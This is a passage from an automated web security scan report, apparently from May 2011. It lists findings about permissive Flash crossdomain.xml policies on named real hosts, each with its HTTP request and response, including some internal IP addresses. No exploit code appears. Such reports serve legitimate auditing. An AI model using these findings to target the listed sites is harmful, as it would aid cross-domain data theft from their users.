Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.44. http://rpt.footlocker.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rpt.footlocker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "16d800-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://s.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.48. http://server.bhphotovideo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.bhphotovideo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "3a990e-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=978
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://sv.liveclicker.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:03:13 GMT
ETag: "111db0-13e-ca84640"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

6.50. http://tags.mediaforge.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.mediaforge.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Server: nginx/0.8.53
Set-Cookie: uID=CqpSnE3Qg4hGhAOdC2IDAg==; expires=Tue, 15-May-12 01:53:12 GMT; domain=.mediaforge.com; path=/
Content-Length: 269
Connection: Close

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><allow-access-from domain="*"/><site-control
...[SNIP]...

6.51. http://uat.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://wasc.homedepot.ca/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.53. http://www.mapquestapi.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquestapi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquestapi.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"276-1302871693000"
Last-Modified: Fri, 15 Apr 2011 12:48:13 GMT
Content-Type: application/xml
Content-Length: 276
Date: Mon, 16 May 2011 01:53:40 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.54. http://www26.orientaltrading.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www26.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "29b86a-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=915
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://ace.imageg.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ace.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 698
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.56. http://ads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 16 May 2011 01:55:16 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.57. http://ads.al.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.al.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.al.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 20 Jul 2010 15:58:07 GMT
ETag: "2013b-284-c045c1c0"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

6.58. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=109
Expires: Mon, 16 May 2011 10:42:55 GMT
Date: Mon, 16 May 2011 10:41:06 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.59. http://gnc.imageg.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gnc.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 405
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-acce
...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.60. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:15 GMT
Expires: Mon, 16 May 2011 10:45:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 54640
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.61. http://images.scanalert.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.scanalert.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.62. http://images3.pacsun.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images3.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
